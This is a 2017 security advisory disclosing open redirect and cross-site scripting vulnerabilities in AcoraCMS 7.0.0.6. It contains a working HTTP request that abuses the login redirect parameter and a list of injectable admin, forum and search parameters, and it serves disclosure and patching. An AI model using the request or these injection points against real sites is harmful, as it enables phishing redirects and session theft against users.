AcoraCMS 7.0.0.6 Browser Redirect / Cross Site Scripting

AcoraCMS version 7.0.0.6 suffers from arbitrary browser redirect and cross site scripting vulnerabilities.


MD5 | ebf9294c3ed3902b8146bd20c62ca6bf

https://www.osisecurity.com.au/acoracms-browser-redirect-and-cross-site-scripting-vulnerabilities.html

Date:
04-Apr-2017

Product:
AcoraCMS

Versions affected:
7.0.0.6 (known bugs from 6.0.6 are still present
http://www.digitalsec.net/stuff/explt+advs/CM3.AcoraCMS.v6.txt).

Vulnerabilities:
1) Arbitrary browser redirect:

POST /forums/login.asp HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
cmRedirect=//osisecurity.com.au&strForumsLoginPrefix=&username=test&password=test

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 141
Content-Type: text/html; Charset=utf-8
Location: //osisecurity.com.au
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jul 2015 05:13:12 GMT

2) Cross-site scripting

/AcoraCMS/Admin/interface.asp [name of an arbitrarily supplied URL parameter]
/AcoraCMS/Admin/users/password_submit.asp [username parameter]
/AcoraCMS/Admin/users/password_submit.asp [email parameter]
/forums/profile_submit.asp [FunctionName parameter]
/forums/profile_submit.asp [cmFields parameter]
/forums/profile_submit.asp [fusername parameter]
/search/Default.aspx [SearchType parameter]
/users/requestaccess.aspx [cmFields parameter]

Credit:
Discovered by Patrick Webster

Disclosure timeline:
14-Jul-2015 - Discovered during audit.
01-Sep-2015 - Reported to vendor.
04-Apr-2017 - Public disclosure.

About OSI Security:

OSI Security is an independent network and computer security auditing
and consulting company based in Sydney, Australia. We provide internal
and external penetration testing, vulnerability auditing and wireless
site audits, vendor product assessments, secure network design,
forensics and risk mitigation services.

We can be found at http://www.osisecurity.com.au/

Related Posts